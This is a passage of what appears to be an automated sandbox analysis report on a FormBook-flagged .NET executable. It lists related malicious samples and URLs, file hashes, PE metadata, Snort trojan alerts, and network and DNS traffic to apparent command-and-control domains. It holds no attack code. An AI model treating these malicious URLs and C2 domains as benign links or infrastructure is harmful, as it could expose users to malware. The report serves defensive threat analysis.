                                            • www.shortexts.com/epns/?6lS0=dI3Yf9uTZTAbXCF6BbS/gogk1F2wKsRWmNO0p//NNyZfeVIkQt6IT+pUp6SqlYDuC11l&hVW=UjWlVXm0fTLtynY
                                            TNT SHIPPING DOC 6753478364.exeGet hashmaliciousBrowse
                                            • www.alldaazz.com/maw9/?0V0hlZ=XWXsKoTGIm4uHXuwUxI2SWJVNAtoSeX/AD8kJREhnqN4l6QppauIxxnj5QSnUcXcVB4L&OVolp8=AZ9lQ6QHS8EdPrG0
                                            L0CzpAvZC0.docmGet hashmaliciousBrowse
                                            • wnc2sod.com/jivo/neky.php?l=wosam7.cab
                                            http://victoriascrets.comGet hashmaliciousBrowse
                                            • victoriascrets.com/
                                            Nuevo orden.exeGet hashmaliciousBrowse
                                            • www.bdcamp.com/fs8/?Rbd=M6AtZDq0P&sZ8p=NOEji/Y2mGsbH23/deqaMT6z03hOleRIA9g6aYtYA7Z0zE2bvyN9F2FNz4vb/LyrvrKV
                                            http://cootewie.comGet hashmaliciousBrowse
                                            • cootewie.com/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comPO11232021.xlsxGet hashmaliciousBrowse
                                            • 54.159.173.74
                                            3543lZhfll.exeGet hashmaliciousBrowse
                                            • 54.211.95.91

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            AMAZON-AESUS2HFJezUWHA.exeGet hashmaliciousBrowse
                                            • 52.20.78.240
                                            QZLQkiS4nj.exeGet hashmaliciousBrowse
                                            • 52.20.78.240
                                            Jx35I5pwgdGet hashmaliciousBrowse
                                            • 54.167.122.21
                                            meerkat.x86Get hashmaliciousBrowse
                                            • 34.228.218.187
                                            invoice copy.pdf.exeGet hashmaliciousBrowse
                                            • 52.200.197.31
                                            mal1.htmlGet hashmaliciousBrowse
                                            • 23.20.158.212
                                            oQANZnrt9dGet hashmaliciousBrowse
                                            • 54.34.104.203
                                            KWDww9OWghGet hashmaliciousBrowse
                                            • 44.207.141.47
                                            TwikaSb2s6Get hashmaliciousBrowse
                                            • 54.204.237.164
                                            TWb3IVgBOQ.exeGet hashmaliciousBrowse
                                            • 35.169.3.110
                                            sora.x86Get hashmaliciousBrowse
                                            • 54.62.131.219
                                            a.dllGet hashmaliciousBrowse
                                            • 44.200.20.85
                                            New Order778880.exeGet hashmaliciousBrowse
                                            • 3.209.180.95
                                            B67M2Q6NeKGet hashmaliciousBrowse
                                            • 44.194.145.165
                                            c0az1l4js3001lsk4xd9n.arm7-20211124-0850Get hashmaliciousBrowse
                                            • 44.207.229.114
                                            c0az1l4js3001lsk4xd9n.arm-20211124-0850Get hashmaliciousBrowse
                                            • 34.231.85.166
                                            0617_1876522156924.docGet hashmaliciousBrowse
                                            • 54.91.59.199
                                            C594188774A2D72B774ACA96EB096C493DBE5C9B599BE.exeGet hashmaliciousBrowse
                                            • 54.83.52.76
                                            x86_64-20211124-0649Get hashmaliciousBrowse
                                            • 54.210.131.199
                                            jLvGTP8xikGet hashmaliciousBrowse
                                            • 34.235.189.214
                                            TRELLIAN-AS-APTrellianPtyLimitedAUpiPvSLcFXV.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            Env#U00edo diciembre.exeGet hashmaliciousBrowse
                                            • 103.224.182.253
                                            IAENMAI.xlsxGet hashmaliciousBrowse
                                            • 103.224.182.210
                                            SecuriteInfo.com.Trojan.Siggen15.46065.1499.exeGet hashmaliciousBrowse
                                            • 103.224.182.246
                                            MDXAR5336e.exeGet hashmaliciousBrowse
                                            • 103.224.212.222
                                            7OjVU04f8q.exeGet hashmaliciousBrowse
                                            • 103.224.212.222
                                            rfq.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            Scan-Copy.docGet hashmaliciousBrowse
                                            • 103.224.182.242
                                            11#U6708 16#U65e5 BL #U505a#U6cd5 SO NO J624 - #U9577#U5f91ISF DETAILS SO J624.exeGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            PO AMO 8100045923.xlsxGet hashmaliciousBrowse
                                            • 103.224.212.221
                                            Company Profile.exeGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            XL9048621.exeGet hashmaliciousBrowse
                                            • 103.224.182.210
                                            goGZ1Tg0WT.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            BwJriVGrt5.exeGet hashmaliciousBrowse
                                            • 103.224.182.208
                                            RQF_190011234.docGet hashmaliciousBrowse
                                            • 103.224.212.221
                                            HIRE SOA NOV.exeGet hashmaliciousBrowse
                                            • 103.224.212.219
                                            RFQ - JAKOB SELMER_pdf.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            Quote request.exeGet hashmaliciousBrowse
                                            • 103.224.212.220
                                            Purchase Order - 10,000MT.exeGet hashmaliciousBrowse
                                            • 103.224.212.221
                                            copy.exeGet hashmaliciousBrowse
                                            • 103.224.182.242

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HkE0tD0g4NXKJfy.exe.log
                                            Process:C:\Users\user\Desktop\HkE0tD0g4NXKJfy.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):2239
                                            Entropy (8bit):5.354287817410997
                                            Encrypted:false
                                            SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                            MD5:913D1EEA179415C6D08FB255AE42B99D
                                            SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                            SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                            SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.841777584881155
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:HkE0tD0g4NXKJfy.exe
                                            File size:446976
                                            MD5:fcc2d1cda8d3989feca9c5f5f900e164
                                            SHA1:075de723df172cc93c537d5472ad8025f192ddc8
                                            SHA256:77e1c24ecfa1d339f61b4b8011690425fa0038b3fe32761f5ce8b3126c28c5ad
                                            SHA512:25f45048ee6bc9164177634d6e4b9f4d3aac06d4d305aa25c16eaf8cf2169767f86cd2879ddabe2e49d8fd38b0a50e115b1735da5a4600ec8c1e243bff2b4863
                                            SSDEEP:12288:wdmXM0WMbeBBYMtWpeUjxU9sQ+WYU1y1wjlvixBFm:wdoM0yGptdU9+WYkvjlvi1
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...-O.a..............0.............B.... ........@.. .......................@............@................................

                                            File Icon

                                            Icon Hash:00828e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x46e642
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                            Time Stamp:0x619F4F2D [Thu Nov 25 08:54:05 2021 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:v4.0.30319
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [ebp+0800000Eh], ch
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6e5f00x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x5fc.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x6c6580x6c800False0.883170272897data7.85414523612IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                            .rsrc0x700000x5fc0x600False0.436848958333data4.2146833829IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x720000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountry
                                            RT_VERSION0x700900x36cdata
                                            RT_MANIFEST0x7040c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Version Infos

                                            DescriptionData
                                            Translation0x0000 0x04b0
                                            LegalCopyrightCopyright Rogers Peet
                                            Assembly Version8.0.6.0
                                            InternalNameReturnValueNameAttribu.exe
                                            FileVersion5.6.0.0
                                            CompanyNameRogers Peet
                                            LegalTrademarks
                                            Comments
                                            ProductNameBiblan
                                            ProductVersion5.6.0.0
                                            FileDescriptionBiblan
                                            OriginalFilenameReturnValueNameAttribu.exe

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            11/25/21-15:09:09.126288TCP1201ATTACK-RESPONSES 403 Forbidden804976634.102.136.180192.168.2.3
                                            11/25/21-15:09:14.229963TCP2031453ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.334.102.136.180
                                            11/25/21-15:09:14.229963TCP2031449ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.334.102.136.180
                                            11/25/21-15:09:14.229963TCP2031412ET TROJAN FormBook CnC Checkin (GET)4978680192.168.2.334.102.136.180
                                            11/25/21-15:09:14.348176TCP1201ATTACK-RESPONSES 403 Forbidden804978634.102.136.180192.168.2.3
                                            11/25/21-15:09:19.479118TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.3142.250.203.115
                                            11/25/21-15:09:19.479118TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.3142.250.203.115
                                            11/25/21-15:09:19.479118TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979280192.168.2.3142.250.203.115
                                            11/25/21-15:09:36.061017TCP1201ATTACK-RESPONSES 403 Forbidden804981234.102.136.180192.168.2.3
                                            11/25/21-15:09:45.250397ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.38.8.8.8
                                            11/25/21-15:10:15.460524TCP1201ATTACK-RESPONSES 403 Forbidden804982134.102.136.180192.168.2.3

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 25, 2021 15:09:08.920068026 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:08.943620920 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:08.945020914 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:08.945138931 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:08.966568947 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:09.126287937 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:09.126313925 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:09.126471043 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:09.126518011 CET4976680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:09.148281097 CET804976634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.207575083 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.229716063 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.229899883 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.229963064 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.251589060 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.348176003 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.348242998 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:14.348376989 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.348406076 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.657246113 CET4978680192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:14.678802013 CET804978634.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:19.462028980 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:19.478698969 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:19.478837967 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:19.479118109 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:19.495594025 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:19.985984087 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:20.007325888 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:20.481894016 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:20.482101917 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:20.482167959 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:20.482223034 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:20.482312918 CET8049792142.250.203.115192.168.2.3
                                            Nov 25, 2021 15:09:20.482362986 CET4979280192.168.2.3142.250.203.115
                                            Nov 25, 2021 15:09:30.374047041 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:30.601291895 CET8049794103.224.212.219192.168.2.3
                                            Nov 25, 2021 15:09:30.601430893 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:30.601727009 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:30.842940092 CET8049794103.224.212.219192.168.2.3
                                            Nov 25, 2021 15:09:30.842967987 CET8049794103.224.212.219192.168.2.3
                                            Nov 25, 2021 15:09:30.843144894 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:30.843224049 CET4979480192.168.2.3103.224.212.219
                                            Nov 25, 2021 15:09:31.060944080 CET8049794103.224.212.219192.168.2.3
                                            Nov 25, 2021 15:09:35.920053005 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:35.941535950 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:35.941663027 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:35.941904068 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:35.963869095 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:36.061017036 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:36.061126947 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:36.061269045 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:36.061312914 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:36.362240076 CET4981280192.168.2.334.102.136.180
                                            Nov 25, 2021 15:09:36.383713007 CET804981234.102.136.180192.168.2.3
                                            Nov 25, 2021 15:09:43.265239000 CET4981980192.168.2.352.204.216.132
                                            Nov 25, 2021 15:09:46.254756927 CET4981980192.168.2.352.204.216.132
                                            Nov 25, 2021 15:09:52.269841909 CET4981980192.168.2.352.204.216.132
                                            Nov 25, 2021 15:10:05.702598095 CET4982080192.168.2.352.204.216.132
                                            Nov 25, 2021 15:10:08.708707094 CET4982080192.168.2.352.204.216.132
                                            Nov 25, 2021 15:10:14.718280077 CET4982080192.168.2.352.204.216.132
                                            Nov 25, 2021 15:10:15.320949078 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.340595007 CET804982134.102.136.180192.168.2.3
                                            Nov 25, 2021 15:10:15.342658043 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.342689991 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.362282038 CET804982134.102.136.180192.168.2.3
                                            Nov 25, 2021 15:10:15.460524082 CET804982134.102.136.180192.168.2.3
                                            Nov 25, 2021 15:10:15.460556030 CET804982134.102.136.180192.168.2.3
                                            Nov 25, 2021 15:10:15.460710049 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.460736036 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.778795958 CET4982180192.168.2.334.102.136.180
                                            Nov 25, 2021 15:10:15.800736904 CET804982134.102.136.180192.168.2.3

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Nov 25, 2021 15:09:08.834608078 CET4955953192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:08.901595116 CET53495598.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:14.145761967 CET5265053192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:14.206563950 CET53526508.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:19.383676052 CET5836153192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:19.459450960 CET53583618.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:25.058619976 CET5361553192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:25.097635031 CET53536158.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:30.115839005 CET5072853192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:30.372935057 CET53507288.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:35.863133907 CET5377753192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:35.918409109 CET53537778.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:41.107296944 CET5710653192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:42.128709078 CET5710653192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:43.175431967 CET5710653192.168.2.38.8.8.8
                                            Nov 25, 2021 15:09:43.262866020 CET53571068.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:45.250235081 CET53571068.8.8.8192.168.2.3
                                            Nov 25, 2021 15:09:45.317536116 CET53571068.8.8.8192.168.2.3
                                            Nov 25, 2021 15:10:05.613094091 CET6035253192.168.2.38.8.8.8
                                            Nov 25, 2021 15:10:05.650708914 CET53603528.8.8.8192.168.2.3
                                            Nov 25, 2021 15:10:09.370842934 CET5677353192.168.2.38.8.8.8
                                            Nov 25, 2021 15:10:10.272214890 CET53567738.8.8.8192.168.2.3
                                            Nov 25, 2021 15:10:15.279592037 CET6098253192.168.2.38.8.8.8
                                            Nov 25, 2021 15:10:15.319477081 CET53609828.8.8.8192.168.2.3
                                            Nov 25, 2021 15:10:20.474148035 CET5805853192.168.2.38.8.8.8

                                            ICMP Packets

                                            TimestampSource IPDest IPChecksumCodeType
                                            Nov 25, 2021 15:09:45.250396967 CET192.168.2.38.8.8.8d05e(Port unreachable)Destination Unreachable

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Nov 25, 2021 15:09:08.834608078 CET192.168.2.38.8.8.80x23a1Standard query (0)www.platinumcredit.netA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:14.145761967 CET192.168.2.38.8.8.80x8897Standard query (0)www.151motors.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:19.383676052 CET192.168.2.38.8.8.80x93b8Standard query (0)www.suepersoldiers.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:25.058619976 CET192.168.2.38.8.8.80xe941Standard query (0)www.thefullfledged.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:30.115839005 CET192.168.2.38.8.8.80xd6bStandard query (0)www.arsels.infoA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:35.863133907 CET192.168.2.38.8.8.80xf03eStandard query (0)www.electricatrick.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:41.107296944 CET192.168.2.38.8.8.80xbdc7Standard query (0)www.jakital.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:42.128709078 CET192.168.2.38.8.8.80xbdc7Standard query (0)www.jakital.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:43.175431967 CET192.168.2.38.8.8.80xbdc7Standard query (0)www.jakital.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:05.613094091 CET192.168.2.38.8.8.80x6d29Standard query (0)www.jakital.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:09.370842934 CET192.168.2.38.8.8.80xa6f8Standard query (0)www.xcgtsret.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:15.279592037 CET192.168.2.38.8.8.80xf205Standard query (0)www.vupeliquid.comA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:10:20.474148035 CET192.168.2.38.8.8.80xf7cbStandard query (0)www.nbtianzhou.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Nov 25, 2021 15:09:08.901595116 CET8.8.8.8192.168.2.30x23a1No error (0)www.platinumcredit.netplatinumcredit.netCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:08.901595116 CET8.8.8.8192.168.2.30x23a1No error (0)platinumcredit.net34.102.136.180A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:14.206563950 CET8.8.8.8192.168.2.30x8897No error (0)www.151motors.com151motors.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:14.206563950 CET8.8.8.8192.168.2.30x8897No error (0)151motors.com34.102.136.180A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:19.459450960 CET8.8.8.8192.168.2.30x93b8No error (0)www.suepersoldiers.comghs.googlehosted.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:19.459450960 CET8.8.8.8192.168.2.30x93b8No error (0)ghs.googlehosted.com142.250.203.115A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:25.097635031 CET8.8.8.8192.168.2.30xe941Name error (3)www.thefullfledged.comnonenoneA (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:30.372935057 CET8.8.8.8192.168.2.30xd6bNo error (0)www.arsels.info103.224.212.219A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:35.918409109 CET8.8.8.8192.168.2.30xf03eNo error (0)www.electricatrick.comelectricatrick.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:35.918409109 CET8.8.8.8192.168.2.30xf03eNo error (0)electricatrick.com34.102.136.180A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:43.262866020 CET8.8.8.8192.168.2.30xbdc7No error (0)www.jakital.comAutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:43.262866020 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com52.204.216.132A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:43.262866020 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com54.164.248.48A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:45.250235081 CET8.8.8.8192.168.2.30xbdc7No error (0)www.jakital.comAutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                            Nov 25, 2021 15:09:45.250235081 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com52.204.216.132A (IP address)IN (0x0001)
                                            Nov 25, 2021 15:09:45.250235081 CET8.8.8.8192.168.2.30xbdc7No error (0)AutoScale-HDRedirect-ALB-1-1859847625.us-east-1.elb.amazonaws.com54.164.248.48A (IP address)IN (0x0001)
